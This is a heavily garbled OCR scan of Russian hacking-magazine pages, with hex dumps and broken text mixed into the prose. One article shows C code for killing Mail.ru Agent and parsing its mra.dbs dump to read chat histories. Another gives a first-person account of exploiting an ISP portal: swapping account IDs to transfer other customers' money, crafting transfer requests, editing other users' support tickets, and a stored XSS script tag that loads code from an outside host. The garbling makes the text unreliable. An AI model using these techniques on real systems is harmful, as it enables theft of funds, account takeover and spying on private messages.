07 00 00 00 26 00 00 00 эе 01 оо оо 01 оо оо оо
06 00 00 00 00 00 00 00 4 С 01 00 00 01 00 00 00
эо 00 00 00 06 00 00 00 01 00 00 00 эс 01 00 00 01 00 00 00 00 00 00 00 74 оо 6r оо 72 оо 79 оо
00 00 00 00 00 00 01 оо оо оо эr 01 00 00 00 00 6D 00 sr оо 67 оо -:; 1 оо 6С 00 2Е 00 72 00
'! С
00 6D 00 61 00 €9 00 69 оо 72 оо б r оо 6r оо
01 00 00 00
04 01
01 00 00 00
0'1 00 00 00 00 00 00 00
только сnравами Администратора] или найти открытый хэндл файла в сис теме, а затем nродублировать его в адресное nро
rt
0'1 00 00 00 07 00 00 00 86 01 00 00 01 00 00 00
01 00 00 01 00 00 00 оо оо
1в
ot
оо
оо
64 0 1 00 00 01 00 00 00
00 00 оо
оо
72 00 7l оо 7S 00
40 00 6D 00 51 00 69 00 ЗSFA8
Off~ot.
Maii. Ru Аген т а
!; с
•
р
д
lC 00 00 00 01 00 00 00 01 оо оо оо ее 01 оо оо 01 00 00 00 00 00 00 00 74 01 00 00 01 00 00 00 00 00 00 00 00 01 00 00 00 62 00 00 00 00 0 1 4[ 01 00 00 09
00 01 00 00
00 00 00 00
00 00 00 00
v
ос 00 00 00 24 01 00 00 01 00 00 00 00 00 00 00 61 00 66 00 69 00 73 00
lE 00 09 00 .:Е 00 6В О оо 67 оо бr оо 2D оо 6С 00 2!: 00 72 00 75 00
m .: ~
о
r
о
у
оо
·S7
1 .:
о
35FдВ·ЭS11Э
ВЬсk.
1Э
n
а
h 1 s
• '
• . ' u m а 1 1.
о
-
Sixe.
lбС
Ид е н т ифи ка торы нач а л а n е реnи ск и
мую с диска [nравда, для этого нужно знать, что такое кластер
и как работать наnрямую с драйвером файловой систе мы] или же наnисать собственный файловый драйвер [это nрактически
pid;pe32.th32ProcessiD; break ;
нереально]. Все бы хорошо, но на nрактике у всех вышеnере численных методов есть свои недостатки. При nеречислении
хэндлов с nомощью ZwQueгySystemlnfoгmation и их коnировании к себе в nроцесс с nомощью
DuplicateHandle
while (Process32Next( hProcessSnap,
&ре32
));
можно столкнуться
CloseHandle( hProcessSnap );
с двумя nроблемами. Первая заключается в том, что nри вызове ZwQueгylnfoгmationFile nоток может nовиснуть, ожидая отклика от блокирующего именованного канала. Вторая- nосле коnиро
вания оба хэндла [наш и открывшего файл npoцeccal будут ука
После того как мы найдем
PID,
нам необходимо получить
а следовательно- текущий режим
nривилегии отла дчика SeDebugPгivilege [OpenPгocessToken >
ввода-вывода. Позиция в файле и другая связанная с файлом
LookupPгivilegeValue > AdjustТokenPгivilegesl и убить nроцесс
информация будут общими у двух nроцессов, nоэтому даже
[OpenPгocess > TeгminateProcessl, а потом снова поnытаться вы
чтение файла вызовет изменение nозиции чтения и нарушение
звать
нормальной работы nрограммы, открывшей файл . Конечно,
nутем- через
зывать на один
FileObject,
CopyFile.
Привилегии можно получить и более элегантным
Native API:
можно nриостановить на время все nотоки nроцесса файла, а nо сле коnирования восстанавливать nозиции чтения и заnускать
void GetPrivilege(IN ULONG Pr ivi l ege)
nроцесс владельца снова, но это связано с большими затратами
{
BOOLEAN OldValue; RtlAdjustPrivilege(Privilege, TRUE, FALS E, &Ol dVal ue);
времени и сил. Казалось бы, идеальным методом может являть
ся nрямое чтение с диска, но и здесь есть недостатки. Таким сnособо м можно читать только файлы, которые открываются
с достуnом F ILE _ READ _ AП RIBUTES [кроме файлов nодкачки], файл обязательно должен быть не сжат, не зашифрован [иначе
Все, mгa.dbs у нас в руках. Теnерь nерейдем к его nотрошению:].
мы nрочитаем ерунду] и иметь свой кластер [маленькие файлы
РАСКРЫВАЕМ СЕКРЕТЫ
в NTFS могут целиком размещаться в MFТI. Также следует
MRA.OBS
учесть, что во время чтения файл может быть изменен [и мы
Файл mгa.dbs nредставляет из себя дамn nамяти Mail . гu Агента,
nолучим в результате неnонятно что]. П оэтому разберем самый
nоэтому открыть его для чтения nри работающей nрограмме не
nростой метод с временным отключением nроцесса Агента. Итак, чтобы убить nроцесс Mail.гu Агента, для начала не
nредставляется возможным [для рядового nрограммиста, но у нас
свои сек реты
:1, также задачу усложняет тот факт, что
в nамяти
обхо димо узнать его идентификатор [PгocessiD]. Сделать это
все числа хранятся в nеревернутом виде. Однако давай немного
можно разными сnособами: через
углубимся в реверс-инжиниринг.
TooiHelp API, через Native API
[исnользуя функцию ZwQueгySystemlnfoгmation], nрошерстив
Итак, в недрах mгa.dbs существуе т хеш-таблица, в которой
сnисок открытых хэндлов или по сnиску открытых nроцессом
оnисаны смещения на 4-байтные идентификаторы. Идентифика
окон [GetWindowThгeadPгocessld[ . Самый легкий вариант- это
торы с лужат для оnределения начала заnиси различных структур
исnользование
и сегментов дамnа, среди которых и находятся нужные нам записи
TooiHelp AP I и
n оиск по имени ехе-файла. Для
этого достаточно вызвать функции CгeateToo lhel p32Snap shot >
истории nереnиски [обрати внимание на соответствующую иллю
Pгocess32Fiгst > Pгocess32Next, а затем в теле цикла сверять
страцию]:
значен ие nоля
szExeFile структуры PROCESSENTRY32 с magent.
ехе . Необходимый нам PгocessiD находится в этой же структуре, nоле th32 P гocessiD:
hProcessSnap; Creat eTool help32Snapshot (TH32CS_SNAPPROC ESS, e ); if ( I NVALID_HANDLE_VALUE !; hP rocessS nap)
typedef struct - ids { unsigned int idl; unsigned int id2; unsigned int count; _ids;
{ Начало истории характеризуется ключевым словом
pe32 .dwS i ze ; sizeof ( PROCESSENTRY3 2 ); if ( Process32 First( hP rocessSnap, &ре32 ) )
mгahistoгy_, за которым следует
{
и
хозяина файла mгa.dbs
контакта, с которым ведется nереnиска. В случае с исто
рией идентификаторы образуют двусвязный сnисок: nервый ведет
do
к nервому отnравленному сообщению, а второй - к nоследнему
if(e {
Х АКЕР
lstrcmp(pe32.szExe File,_TEXT("magent.exe" )))
nринятому сообщению . Количество сообщений можно узнать,
изучив четыре байта nосле идентификаторов [структура _idsl.
061
04/159/ 2012
www.epidemz.net
взлом
71 01
оо оо
со 9С
sr
07
оо оо оо
DS 69 87 св 01
~~ ~~ ~~ ~~
::
се
01
оо оо iMfMШMШ M !,Mji ! ,М.!.Моо оо оо
07 оо оо оо
D oo
оа оо
~~ ~~ ~~ ~: ~~ ~~ ~~ :~ ~~ ~~ ~~
lB 0 4
4Е
04
З1
04
ЭВ
3
4
5
б
7
00000000
01 00 00 00
О
~
0'1 00 00 00
СО
9'1
А2
02
01 60 AD 02 01 80 82 02
00000010
!о ЛО l!E 02
02iEA010
01 2 0 ВВ 02 0 1 00 Bl 02
01 АО Аб 02 01 С О 81 02
00000020
69 29 01 00
024ЕАО20
01
Off!let
b r оо оо оо эs оо оо
::':-",.-+.,::;;;:;...,..._r·
Структура заnиси сообщения
1
2
З
О
Off!let
1
АО
2
81 02 01 60 Bl 02
8
01
9
ЕО
А
В
А9
С
Е
D
02 01 20
АА
r
02
Пои ск х еш -таблицы
Пр ойдя по смеще нию идентификатора [его можно узнать из хеш
стру ктуре х рани тся количество записей истории или, проще
таблицыl·мы попадем на запись сообщения [с н ова все внимание на
говоря, количество переписок. Так как файл дампа постоянно
соответствующий рисунок] :
расширяе т ся, то по с мещению Ох2С лежит иден т ификатор посл е д ней записа нной истории ,- это все, что нам нужно знать, чтобы
struct _message
начать искать идентификаторы переписок .
В целом же алгоритм такой: пр охо димея по идентификаторам записей истории с пом о щью
int size; int prev_id; int next_id; int xz l ; F ILEТIME time ; unsigned int ty pe_mesage ; char fiag_incoming; char Ьуtе( З ]; unsigned int co unt_n i ck; unsigned int magi c_n um; 11 ехзв unsigned int count _message; unsigned int xz2; unsigned int size_lps_rtf; unsigned int хzЗ;
unsigned unsigned unsigned unsigned
цикла [начиная от последней добавленной записи]; если в этой записи о т смещения Ох190 присутствует слово «m г ahistoгy_>>, то это означает, что по смещению Ох24 лежат идентификаторы цепочки сообще ний данной переписки. Ч тобы стало немного понятней, взгляни на этот ко д:
DWORD * offset_taЫe=(DWORD *)(mra_base + *(DWORD*)(mra_base + exle )); DWORD end_id_mail= *( DWORD*)(mra_base+ex2e+ offset_taЫe[ l ]);
DWORD count_emails= *( DWORD*) (mra_base+ex2C+ offset_taЫe( l ]);
}; for ( int i=e ;i <c ount_emails;i++) Строки в дампе сох раняют ся в кодировке Unicode [wchaг_tl различными способами :
{
id s *mail_data =( struct _id s* )(mra_base+ offset_taЫe(e n d_id _m ail]+4 );
с завершающи м нулем в конце строки;
в структуре LPS [название структуры взято из описания фор мата протокола ММР], гд е первые ч е т ыр е байта указывают на
if (memmem((( unsigned char *)mail_data+ex 19e ), mrahistory, ... ))
длину последующей с тр оки; в формате
emails[k].id=(_ids *)(( unsigned char*)mai l _data+ex24 );
RTF.
Зная количество сообщений, нам не составит труда пробежать ся по всей цепочке. Н о о т куд а вообще узнать, где находится эта
end_id_mail=mail_data- >id2;
хеш -таблица, и как на йти начало за пи сей истории? Над поисками ответов к эт им вопросам мы с
SOLON 7 провели
немало бессонных
кадим
ночей.
Журнал не резиновый, п оэтому исходный код читалки mгa.dbs ищи
НЕМНОГО МАГИИ По смещению
OxlO
на диске. Сейчас я покажу тебе лишь самые ос новны е моменты.
от начала файла mгa.dbs, как оказалось, и хра
Итак, файл mгa.dbs является дампом памяти, поэтому мы не буде м
ни т ся а др ес завет ной хеш-таблицы. Пр ойдя по с м ещению первого
извращаться и использовать функции для работы с файловыми
ин д екса из хеш-таблицы, мы н а тык ае мся на структуру нача ль
смеще ниями, а сразу поместим его в память нашей прогр аммы. Дл я
ных данных. В озможно, там находится вообще вся информация,
этого заюзаем ресурсы ОС
заложенная в mгa.dbs. Ид ем дальше. П о смещению Ох20 в этой
файл:
Windows
и создадим М еmо г у
Mapp ed
ТИПЫ СООБЩЕНИЙ MRA.DBS
н е автори зо ванны е
з апро с ы
обычны е
п ере д ача
за п иси
сме н а
п о льз о ват е ли
автори з ации
с ообщ е ния
фай л о в
в мик р об л о г
г ео п о ло же ни я
ХАКЕР
062
www.epidemz.net
04/159/2012
Взлом Maii .Ru Агента
•-.,История
Правка
Контакт
?
•
gar .i .k@rnail .ru
26
25amelia~~mail.ru
235
Здравствуi1те! Пожалуйста 1 добавьте r-1еня в ва ш сnисок ко нта ктов.
_Ыock-hea r1_@inbox.ru
_r~ o_1 23@moi l .rtr
Amelia frank
08071961 @moil.ru 11 333695@chat .ogent 24201 @moil.ru
1
Здравствуй ! Как через тел.сот. Загрузи т ь фотку в анкету 1 что бы Nеня
16 94
401204 7@chat .agenl 534147@rnoil.ru 666clirnakat999@rnail.rtl 98tirn@rnail.rtl a_a_a_palevo@rnail.ru abdulrnanova_regina@rna abrarnova--alena@rnail.ru abyss .90@inbox.ru adelina-56x@rnai1.ru ademulko@rnail.ru afanasij286905@rnail.rlJ ailitakiyakbaeva@lnail.ru air -trading@rnail .ru aist_ @rnail .ru ako880@rnoil .ru alblna _vladikovkaz@rnail .ru alblno654@rnail.ru
Посмотреть а ват ар
мон ~1нр
_j
::;;0 Блопt
~ --
1
12
а х рен знает
массива, она позволяет хранить пары «К ЛЮЧ значение н.
Двусвязный список состоит из элементов данных ,
каждый из которых
blt.ly/zsTJТb:
содержит ссылки
Жаль,чеt·1 зани 1·1а е ш ься?
•
Г Р• к Дж:ан
три метода
так и на nредыдущий
файлами:
элементы .
blt.ly/zNg02S;
An1elia Frank
способы получения
•
Я не буду о твле кать надеюсь ф~tлы·l интересн.
как на следующий,
работы с занятыми В даННЫЙ f·10f>IBHT К ИНО (110ТРЮ
различные
списка процессов :
bit.ly/w4upz5; •
умень шение
размера Си программы на
nримере
<# # #20# # #imgOOO > 27
cOdedgarik.Ьiogsoot .
интерфейс
An1elia frank
Amelia frank
29
мой благ :
реализующая
ассоциативного
роs-файлов :
Г ар.·к Дм 111
9 3
Hjstory Reader: blt.Jy/x2oKvU;
• С++ класс для создания wiпhe x.
Г ар." д к. н
прикольный
51
blt.ly/z2EТMY: • обсуждение Mail.ru
•
Хеш-таблица- это структура данных ,
5.4:
=
видели.
t~*~фФф~ - Ш-~®~·a~.~Ш®~·I'DI111111r..~~c~w З48241@rnail .ru Скоnировать E-mail
Mail.ru
Агента до версии
Почта
_bek_@inbox.rtj
Описание формата
истории
января 2011г.
Visual
Studio: blt.ly/w7sWNA.
января 2011г.
Amelia frank
4
Добр.ноч~1 !ка к фильио прооютр?
v
Интерфейс моей читалки
После прохода по и дентификаторам и поиска строки «m гahistoгy_>> наша структура будет заполнена адресами иден
Create Fil e CreateFileMap MapViewOfFil e VirtualFree CloseHandle CloseHand le
тификаторов. Заметь, при этом мы не скопировали даже байта
и израсходовали всего лишь 16*count_emails байт /напри м ер, при 1 000 контактов мы используем всего -15 килобайт памяти). Теперь, имея на руках идентификаторы начала переписки с конкретным пользователем, мы можем прочитать сообщения:
Так как нам не нужно сохра н ять внесенные изменения обратно в файл, то здесь вместо UnmapViewOfFile используется Viгtuai F гee. Первое, что мы сделаем, это найдем все контак т ы из истории пере писки. Хранить найденное добро будем в структуре emails:
int id_message=emails[k] .id->id l ; for ( int i= e;i <emails[k].id->count_me ssages; i++) { _message* mes = (_message*)(mra_b ase+ offset_t aЫe[id_m essage]);
typedef struct _emails{ wchar_t *e mai l ; ids * id ;
wchar_t * str = ( wchar_t *)(( unsigned char * )mes + sizeof ( _me ssage));
};
id_message=mes->prev_id;
struct _emails *ema ils; Дата сообщения хранится в форма т е FILETIME, для удобства
emai l s=VirtualAlloc(e,count_email s* sizeof ( struct _emai ls) , .. );
ее можно перевести в удобочитаемый вид с помощью функции
FileTimeToSystemTime. Формат RTF отлично воспринимается Rich Edit'oм и любыми другими стандар тными редакторами типа WoгdPad. Но с этим можно и не заморач иваться, так как сооб щ е ния хранятсявнеотформатированном виде сразу после ни ка, а их
RICH ТЕХТ FORMAT (RTF)
размер указа н в структуре message. Это все, что тебе нужно з н ать, чтобы получить удобоваримый список мессаг из А г ента.
RTF,
использующийся в
mra.dbs,
nред ставляет из себя формат
х ранения разм еченных документов , пр е дложенный еще в бо родатыми программи стами из
1982 году
Microsoft и Adobe . Для е го парсинга
P.S. К сожалению, формат журнала не позволяет привести здесь мои хардкорные изыскания полностью, поэтому поспеши заглянуть на
с овершенно не обязатель но изобретать велосипед , а достаточно
диск. Надеюсь, пример кода читалки lехе'шник ко т орой, кстати, с по
лишь отправить сообще ние
мощью небольшой оптимизации уместился всего в 2 килобайта безо
з аписи и
EM _S TREAMOUT
EM _S TREAMIN с SF_ТЕ Х Т
с флагом
флагом
SF_ RTF
для
всяких пакеров) поможет тебе в написании быстрого и кру т ого С-кода,
для чтения:
а также в изучении hех - редакторов и других низкоуровневых вещей.
ED ITSTREAM es = { е }; es .pfnCallba ck = EditStreamCallba ck; es. dwCookie = ( DWORD_PTR)&lps; Se ndMess age (hR i c h, EM_STREAMIN, SF_R TF, ( LPARAM)&es);
Кстати , незатронутой осталась не менее увлекате льная тема чтения
истории IСQ-переписки, которая также хранится в файле mгa.dbs. Спасибо компании Maii.Ru, во-первых, за разработку Maii.Ru Агента, во-вторых, за заметное развитие любимой аськи, и в-третьих, за
интересный к вест, о котором я тебе сегодня рассказал. :Х:
ХАКЕР
063
04/159/ 2012
www.epidemz.net
взлом
Daeren Torn
Вся информация предоставлена исключительно в ознакомительных
целях. Ни редакция, ни автор не несут ответственности за
халявщика НЕ ВЫДУМАННАЯ ИСТОРИЯ О СЕРЬЕЗНЫХ УЯЗВИМОСТЯХ
ПРОВАЙДЕРА
любой возможный вред, причиненный материалами данной статьи .
Эта история взлома была бы ничем не примечательна, если бы не одно « НО ». Жертвой глупейших ошибок программистов стал довольно крупный провайдер. Элементарные уязвимости в личном кабинете пользователя позволяли манипулировать денежными средствами на счете
любого из клиентов . Такое Увы, и такое бывает.
www.epidemz.net
Буд н и ха л яв щ и к а
Осноаноii счеr:
Баланс:
-
09
216
рvб.
ОТВЕТ НЕЗ
Кабинет nоль3 ооателя:
ЖДАТЬ,
дбо н е•п , уже сеИ~ас у Вас есть В ОЗ'"~ОЖность nодкпючиться к услуге кабельного
п
информацию по nодключению и активации настояшей услуги Вы можете у l""еНеДЖQ ра КО"''П Э НИИ По.а робнее о траi'!С/1 11руеш,,х ICII IЧt!IIIX
А
Tapщ!!DI
бонуса Ba"'' необходи..,о: nодключить к сети нашей ко11nании своего друга. или родсrвенмика и Вы nолучите бо1-1ус в раз"'ере 300 рублей на свою учетную запись. попучения бонуса no акции «Приведи друга• еобходимо учесть следуюшие условия:
• 1. • 2.
e5o.;etft"O,. комnан• • и .apyr npo.IКиo.aer 11 аоне .соторы•i
еы яе.nяеrесь
В.,w 1шееrтехtшчес<vю ео~НО)I(nССТЪ nоаi(Jiюченш:• к cen1 (ссылJ<а) • 3. Ваш •npyr• .!iiКIIIOЧiler дОГРISОР С HIIWe~ KOHПIIHI1eЙ Hll П0д'</110ЧеН11е К Cef\.l\1rпept'leT, YICII]ЫII<!JЯ Прl! ЭtnH 8lJiWИ ФНО 11 l!lдpec ПОЛ!(JiоQЧенир
nосле nодключемия ~друrа> на Ваш счет поqупит бонус в раз ... ере исnользовать на любые достуnные в личном каби11ете услу~. больше друзей Вы nриведете, те11 больше бонусов nолучите!
300 рублей, которые
После
*****09 *****6 1 ***** 60
-85 р
Основной
-7lp
Ин тер н е т
ер
счет
Т елеви де н ие
Как ни стр анно, данная операция прошла успешно.
Epic fail .
Интернет, впрочем, у меня от этого не появился, поэтому я снова обратился к html-исходнику страницы своего личного кабинета. Изучив его более подробно, я заметил следующие input-npeфикcы:
Перевод с редсrв между уч етны ми зап и сями.
<<m_fгom>> и Счет для сn нсання
Услуга
Ба л<~ н е ( ру 6.)
ЛОГ)!Н
09 61
С чет для nоn оnнен ня
Балан с ( ру6.)
Лоrнн
216
Осноаноii сче т
578.51
~tнтернет
60
<<m_to>>. Все
указ ывало на то, что это были идентифи
каторы счетов в БДI Здесь возник резонный вопрос: отслеживает ли сервер подмену
Недолго думая , я стал проверять свою до
10?
гадку: изменил две последние цифры в поле <<m_fгom>>, примен ил
09
578.51
61
изменения, выбрал нужные счета и нажал на кнопку <<Оnлата» . Заnрос с измененным
60
10 ушел
на сервер . Ответ не заставил себя
ждать,- показалась форма с предложением перевода средств.
Бингоl Номер счета, откуда будут переведены средства, не со вnадал с моим номером, а в поле <<Укажи те сумму» была указана
Стра н ица п е р е вода с р е дс т в
сумма, равная количеству сре дств на счете, с которого осущест
влялся перевод. Как ты помнишь, на моем счете в тот момен т было
ВВЕДЕНИЕ
-85
История началась очень странно. На календаре было
31
декабря,
рублей , а форма предлагала мне nеревести все
2901
Указав
немноги м меньшую сумму [для незаметности), я нажал <<Переве
а на н аутбуке- дисконнект. Средства на счете закончились,
сти>>,- и оnерация завершилась успехо м . Значит, уязвимость есть,
и было совершенно непонятно, что дальше делать всю ночь без
сервер не проверяет
интернета [в новогоднюю-то ночь?- при м. редакции!? На счете
сты, бравоl Вернув деньги обратно, я решил углубиться в nоиски
Webmoney
не было достаточно денег, чтобы полностью оплатить
10
на привязаннесть к аккаунту. П рограмми
других ба го в. Тут сразу стои т отметить, что все эти эксперименты
абонентскую nлату, nоэтому я уже готов был идти к ближайше
могли серьезно испортить мне жизнь,- повезло, что провайдер
му терминалу оплаты. Зайдя в личный кабинет, чтобы уточнить
решил не обра щаться с за явлением о моих действиях в правоохра
сто имость абонентки, я обратил вниманиенанеактивные
нительные орга ны. В такой ситуации оправдаться у меня уже не
html-
переключатели, расположенные на странице перевода средств.
П охоже, Дед Мороз все-таки существует:).
получилось бы.
У ЧЕТ ОПЕРАЦИЙ
БЫТЬ ИЛИ НЕ БЫТЬ?
Итак, предыдущая находка меня очень обрадовала. Теперь
Дальше я пол ез в исходный код страницы с nомощью браузера
осталось узна ть, насколько видны мои действия второму лицу.
Орега и убрал у соответствую щих переключателей nараметр
Ведь у каждого уважающего себя провайдера есть такая вещь как
«disaЫed>> [когда баланс равен нулю или отрицательный, то дан
статистика/история платежей, nредназначенная для то г о, чтобы
ный переключатель неактивен). После этогонехитрого действия я
следи ть за nередвижением средств на счетах. Перейдя к истории
примен ил изменения и поnробовал перевести все средства с тре
nлатежей, я снова открыл исходный код страницы. Немного поли
тьего счета на nервый- основной:
став е го, я сразу заметил тот же самый способ работы с
10. Для
его
передачи серверу исполь зо валась строка следующего вида:
До
***** 09 ***** 61 *** **60
lSp -71р
1 Основной счет 1 Интерне т
-100pl
<input type=button vа l uе= 'Показать' name=show_orders_lis t onClick= 'showPay(this.form, *** 39)' >
Телевиде н ие
<td style='background-color:#D2FFCF;'><input type='radio' name= m_from' id='m_from </b></label></td> <td style='background-color:#D2FFCF; '>216</td> <td style='background-color:#D2FFCF;'><b>O cнoвн oй счет </Ь></td> <td style='background-color :#D2FFCF;'><input type='radio' name='m to' id='m_to~ 7' b></label></td> <td style='background-color:#D2FFCF; '>216</td>
' value=' lll00' ><label
value=' ~ 7'><label
П е рвы й ба г с п е реводам с р е дств
Х АКЕР
04/159/2012
065
www.epidemz.net
. ВЗЛОМ
Здесь я снова изменил
ID
и немедленно нажал «Показать»,
о п ять ус п ех: я увидел все операции со средствами на чужом
ID!
Н о там был и мой след . Значит, все мои действия с деньгами были
заметны второму лицу. Однако все равно здесь не было видно, куда и почему они были переведены, -таблица предс т авляла из себя
три столбца: « Д ата>>, <<Сумма [руб.!>> и «Номер учетного документа>>.
Для получения f:loнyca Вам неоЬходимо: подключить к сети нашей компании своего друга,
знакомого или родственника и Вы получите бонус в размере 300 рублей на свою учетную заnись. Для nолучения бонуса по акции «Приведи друга» необходимо учесть следующие условия: • l. в~ ll&.nя етесь обон е нтом • 2 . 8iЩI друГ ПРОЖИIIОеТ 11 .QO,..I!, KOTOJ)Ыii IIM!!eT TeXнi\ЧeCii.YIO 1103НОЖН О СТЬ ПOliКIIIOЧI!tШЯ lt Ct: ТII {CCbi/IK~) • ), BI!IW друГ• 31!1К/\ЮЧОеТ ДОГОООJ) С HIIWeЙ KOHПIIHIII!a на П0lЖ11ЮЧеНIН!! К CI!ПI llнтермет, YK031:>11!111R ПPII ~ТОН В&WII Ф~IQ
11
о.арес ПO.QI(IIIOweнlt$1
Сразу nосле подключения «друга:. на Ваш счет nоступит бонус в размере
300
рублей, которые
.можно использоват ь на любые доступные в личном кабинете услуги.
Чем больше друзей Вы приведете , тем больше бонусов получите!
БОЛЬШЕ, БОЛЬШЕ КРОВИ! Ладно, с этим все ясно, но что можно сделать еще? На глаза по палась кнопка «Запрет доступа>>, отключающая все предоставляе мые провайдером услуги. Работала она также с
ID и JS . Конечно,
увидеть работоспособность этой вещи я н е мог. Или же можно было написать скрипт, который прошелся бы по списку
ID
и отключил
всем пользователям интернет/телевидение/телефон-даешь хлеба и зрелищ :1. Однако одним запретом доступа я ограничи ваться не захотел и попытался разобраться во всем этом на более
ПOKi!JliiТЪ JliiПPOCЫ Эlllroлoaoи: СтраН\\UЫ: Авт ор:
Я Hllllb111
..
COJ.QliiTb 3liiПpoC
3lllnpocn:
Автор : 1<
НЕ работает мнтернет
1
К
~ч
0110110Wlll 1 ПОГ11l11ЛьТе
О;р~гкn•роsг"
Дата :
2012·02•02 12:40:45
нен" • "' _ "'•
2012·02·02 13:16:54
глубоком уровне . Итак, вернувшись к о п ерациям над средствами, я запустил Добаамть новое сообщен и е
прогу Chaгles [chaгlespгoxy.com- замечательный снифер, дебаггер и прокси-сервер в одной упаковке!. Но данные шиф ровались, и ничего толкового я не увидел. Тогда я запустил
IE
с плагином ieH T TPHeadeгs, перешел в личный кабинет и произвел
Ти кеты с л уж бы п одд е р ж ки
уже з н акомую тебе транзакцию средств с одного счета на другой. ie HT T PH eadeгs показал следующий запрос:
она на методе
Basic Autheпticatioп.
Мне хватило всего пары минут,
чтобы накидать программу для бр у тфорса. Благо, все дороги были
POST /client. php
о ткрыты, а доступ в личный кабинет ос у ществлялся по локальной
xjx f uп = chaпge C hack&x j xargs[ ]= *** 1 8&x j xargs[ ] =* ** 39&
се ти , т о есть интернет не был н у жен, и все могло произойти очень
xjxargs[]=12e . e
и очень быстро ...
Вп ос ледствии я рассказал об обнаруженной уязвимости !Т Здесь ключи массива такие:
счет,
3- скол ь ко
1-
с какого счета,
2-
на какой
денег п ереводить. Д алее я решил попробовать
сформировать аналогичный предыдущему GЕТ-запрос и перешел
отдел у провайдера , так что она была довольно быстро исправлена. Ошибк у объяснили тем, что «все работало через хитрую схему,
ПОЭТОМ У так глупо И ВЫШЛО>>
:J.
по сформированной ссылке. Все снова работало, средства перево дились. Я думаю, теперь ты понимаешь, что можно было натворить
при помощи базовых знаний
JS
и больной фантазии? К слову, тут
НОВЫЕ БАГИ Проходит день, неделя, месяц, и у меня появляется желание про
мне вспомнился фильм }{ОТТfаБЬIЧ: «-А сколько качать-то? - Че
верить что-нибудь еще в личном кабинете. Я открыл страницу
ты тупые вопросы задае ш ь? Миллион качайl».
просмотра статистики, изменил
10,
отправил запрос. В итоге на
моем экране вновь отобразилась чужая статистика. Оказалось,
ЧТО-ТО ЕЩЕ?
что после прошлого исправления корректно стало работать только
Д алее я подумал, что можно копнуть еще глубже. В самом начале
тот раздел личного кабинета, где осуществлялся перевод средств,
каждого из html - исходников была такая строка: js/fuпc . js. Хорошо,
а все остальное так и осталось по-прежнему. Я не захотел ковы
формирую ссылку, перехожу по ней и вижу реализацию функций
ряться дальше со старыми багами, поэтому попробовал найти еще
операций на сай т е . Самой нужной мне вещью оказалась функция
места, где использовался столь оригинальный метод работы с кон
saveNewPass[l - она работала по той же схеме ID+JS. Как ясно из
фиденциальными данными пользователей. Тут стоит заметить, что
названия, предназначена эта функция для смены пароля пользо
меня уже давно интересовал раздел <<Электронные заявления>>.
вателя. Все, что нам надо, - код, который бы осуществлял про
Зайдя туда, я создал бессмысленный вопрос: <<Почему
стейший перебор по словарю и менял его при условии нахождения
привязывается к учетной записи?>>. Страница с вопросом содержа
не
верной ~омбинации. Какова вероятность того, что все пользова
ла довольно интересную информацию : ФИО
тели изменили стандартные парали [обычно состоящие всего из
вала возможность правки сообщения, а вот кнопка удаления не
нескольких цифр!? Кстати, тут не было даже банальной капчи или
работала. В исходном коде нашлась такая строка:
блокировки по
IP
+ IP.
Также присутство
при множественных ошибочных авторизациях
-
и других запросах! Да и авторизация тоже хромала- основана
са href= "JavaScript : edit_post( *** el, ***1)" class=zll><font c l ass=zll> P eдaктиpoвaть</font></a>
Я поправил значения, вычтя из каждого по
3,
примен ил измене
ния, нажал «Редактировать>> и увидел страницу с тикетом другого пользователя! Изменив его, я попробовал сохранить вопрос, операция завершилась успехом. После, еще раз изменив значени е ,
я попал уже на ответ техподдержки. Поправил, сохранил,- все получилось. Значит, я могу править сообщения любого юзера! Осталось лишь найти остальные функции для работы с заявками.
и
Снова немного покопавшись в исходном коде страницы, я отыскал строку следующего вида:
cscript language= 'JavaScript' src= 'js / hd.js ' ></script> Собственно, в файле
js/hd.js и лежали функции для работы
ХАКЕР
066
www.epidemz.net
04/159/2012
Будни халя вщика
с заявлениями. Я решил использовать функцию
showTiket[n] .
Поправив код и указав произвольный номер заявления, я прим е н ил изменения и нажал на кнопку «Редактировать>>. Открылась с траница , на которой был запрос пользователя, а также ответы от
т е хподдержки. Вроде бы ничего такого, но я увидел их ФИО и
IP!
К с тати, злоумышленник в такой ситуации мог бы подождать ответа т ех п о ддержки любому пользователю, а после отредактировать
соо бщение, на'пример, так: «[качайте[ ... ] для устранения про блемы, но антивирус может ругаться на данное приложен и е, так
2012 · 02·02 11:02
·117.00
qOOO
ч то отк лючите его на время>>. Вуаляl Тр оя н залит, да еще и от лица
20 12 ·02·02 04:02
1.00
qOOO
провайдера.
2012·02·02 04:02
1.00
qOOO
2012·02·02 03:0 2
·15.00
qOOO
2012·02-02 03:02
зо.оо
qOOO
Хоро шо , я нашел способы редактирования, удаления, просмо
2012 · 02 · 02 03:02
·15.00
qOOO:
тр а и отправки т икетов . Идем дальше. Вернувшись в личный
2012·02·02 03:02
·100.00
qOOO
каб ин е т, я решил поискать
2012-02·02 03:02
100 .00
qOOO
2012-02-02 03 :02
100.00
qOOO
А КАК ЖЕ
XSS? XSS.
Потратив достаточно времени
на п о и с ки , я н е нашел уязвимых мест [так мне тогда казалось]. Однако дальше, взглянув на раздел под названием <<Контактная
и нформация >> , я у видел , что у каждого из трех полей l<<e-mail>>, <<Тел е фоны >> и << Телефон для SМS-уведомлениЙ>>] есть кнопка
История перевода средств
для редактирования. Телефоны, это понятно, должны иметь
очевидную фильтрацию цифра/не цифра, но вот поле
<<e-mail >>
вп о лне может с одержать в себе ба г. Я попробовал прот о лкнуть простой код:
xjxfun•saveE mail&xjxr• 1328363403426&xjxargs[]•TEST xjxfun=saveTel&xjxr=1328363361153&xjxa rg s[)=eeeeeeeeeeee xjxfun=saveSMS Tel&xjxr=1328363389834& xjxargs[ )-eeeeeeeeeeee
<script src• "http: //***/ o.js" type• "text / javascript " > </script>
Открываю переменную хjхг, составляю GЕТ-запрос, выполняю его и проверяю- все работает, значе ния сохраняются. Теперь не
много изменим запрос сохранения
Естественно, все это дело спровоцировало ошибку <<Введен нек о рректный
e-mail>>.
Хорошо, возвращаюсь к
IE
/cl ient.php ?x jxfun •save Email&xjxargs(]• cscript src•"http:// ***/o . js" type•"text / javascript" </script>
г о ворит << ieH ПPH eadeгs>>:
POS T /client.p hp
e-m ail'a:
и смотрю, что мне
НТТР / 1 . 1
В
o.js находится обычный aleгt["XSS"];. Выполняю- успех!
Мо й ядо в итый текст успешно был сохранен. Дал ее я решил обновить главную страни ц у личного кабинета и с разу же ув идел вы ск очивший aleгt. Что может быть лучше активной
XSS
на гл ав
н ой с транице личного кабинета любимого nровайдера? Однако эт ого мне было мало, необходимо добить еще два поля. Вот что я с д е лал:
